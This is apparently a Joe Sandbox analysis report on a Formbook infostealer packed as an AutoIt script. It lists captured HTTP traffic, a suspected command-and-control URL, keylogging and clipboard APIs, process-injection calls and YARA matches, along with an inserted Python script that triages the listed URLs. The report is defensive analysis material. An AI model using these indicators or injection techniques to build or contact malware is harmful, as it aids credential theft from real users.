189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:04 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 02 Jul 2024 11:54:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.motorsportgives.com
Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.motorsportgives.com/9qp3/
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://aaa.za1.bztqk.cn/123.html
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c
Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6
Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000009.00000003.2979596844.0000000007C65000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RpcPing.exe, 00000009.00000002.3338691097.00000000030A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
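Added example, not part of the Joe Sandbox report: a Python triage pass over the "String found in binary or memory" rows above, a few of which are reproduced as constructed input in the flattened form the page uses. It extracts each URL together with the memory dumps it was found in, reads the dump name's first field as the process index that the function ids also use (0000000A is process 10, DUipWAeQLm.exe, in this report) and its fifth field as the region's PAGE_* protection, and sorts browser search-provider and Microsoft-account URLs (what a stealer sees when it reads browser profile data) away from a host with a short single-directory path such as /9qp3/, the shape the www.motorsportgives.com URL takes here. The allow-list, the PAGE_* reading of the dump name and the short-path heuristic are my assumptions; the report only lists the strings.

```python
import re
from urllib.parse import urlsplit

# Constructed input: rows copied from the report above, in the page's flattened form.
ROWS = [
    "Source: DUipWAeQLm.exe, 0000000A.00000002.3339015758.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.motorsportgives.com/9qp3/",
    "Source: RpcPing.exe, 00000009.00000002.3340567073.0000000004056000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000009.00000002.3341923085.0000000006240000.00000004.00000800.00020000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339897724.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aaa.za1.bztqk.cn/123.html",
    "Source: RpcPing.exe, 00000009.00000003.3007910666.0000000007C8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: RpcPing.exe, 00000009.00000002.3338691097.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
]

ROW_RE = re.compile(r"^Source: (?P<srcs>.+?\.sdmp)String found in binary or memory: (?P<url>\S+)$")
# Assumption about the dump file name: <process index>.<n>.<n>.<base address>.<protection>.<3 more fields>.sdmp
DUMP_RE = re.compile(
    r"(?P<proc>[^\s,]+\.exe), (?P<pid>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?:[0-9A-F]{8}\.){3}sdmp"
)
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Analyst allow-list (assumption): search-provider defaults, Baidu analytics and Microsoft
# account endpoints that a stealer picks up from browser and mail profile data.
BENIGN_HOSTS = {"ac.ecosia.org", "cdn.ecosia.org", "www.ecosia.org", "ch.search.yahoo.com",
                "duckduckgo.com", "www.google.com", "login.live.com", "hm.baidu.com"}
# Heuristic (assumption): a bare short single-directory path, as in /9qp3/ above.
SHORT_DIR_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")


def parse_row(row):
    m = ROW_RE.match(row)
    if not m:
        return None
    dumps = [{"process": d["proc"], "pid_index": int(d["pid"], 16), "base": int(d["base"], 16),
              "protect": PAGE_PROTECT.get(int(d["prot"], 16), hex(int(d["prot"], 16)))}
             for d in DUMP_RE.finditer(m["srcs"])]
    return {"url": m["url"], "dumps": dumps}


def classify(url):
    parts = urlsplit(url)
    if parts.hostname in BENIGN_HOSTS:
        return "browser-or-account-artifact"
    if SHORT_DIR_RE.match(parts.path):
        return "c2-candidate"
    return "unknown-review"


def triage(rows):
    """Return one record per URL: verdict plus the processes and regions it was found in."""
    out = []
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        rec["verdict"] = classify(rec["url"])
        rec["processes"] = sorted({(d["pid_index"], d["process"]) for d in rec["dumps"]})
        out.append(rec)
    return out


if __name__ == "__main__":
    for rec in triage(ROWS):
        print(rec["verdict"], rec["url"], rec["processes"],
              [(hex(d["base"]), d["protect"]) for d in rec["dumps"]])
```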
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 0000000A.00000002.3339015758.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000002.00000002.2667649545.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000009.00000002.3339723767.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000009.00000002.3339772912.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000002.00000002.2670025660.0000000006E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000009.00000002.3337846059.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000008.00000002.3339477334.0000000002D90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000002.00000002.2668432458.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: This is a third-party compiled AutoIt script. (0_2_00753B4C)
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_3342c16e-e)
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_65349da8-f)
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_fb7c4258-9)
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_a09d0e2e-e)
Source: C:\Windows\SysWOW64\svchost.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C223 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C74650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C72C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C73D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03524340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03524650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522EE0 NtQueueApcThread,LdrInitializeThunk
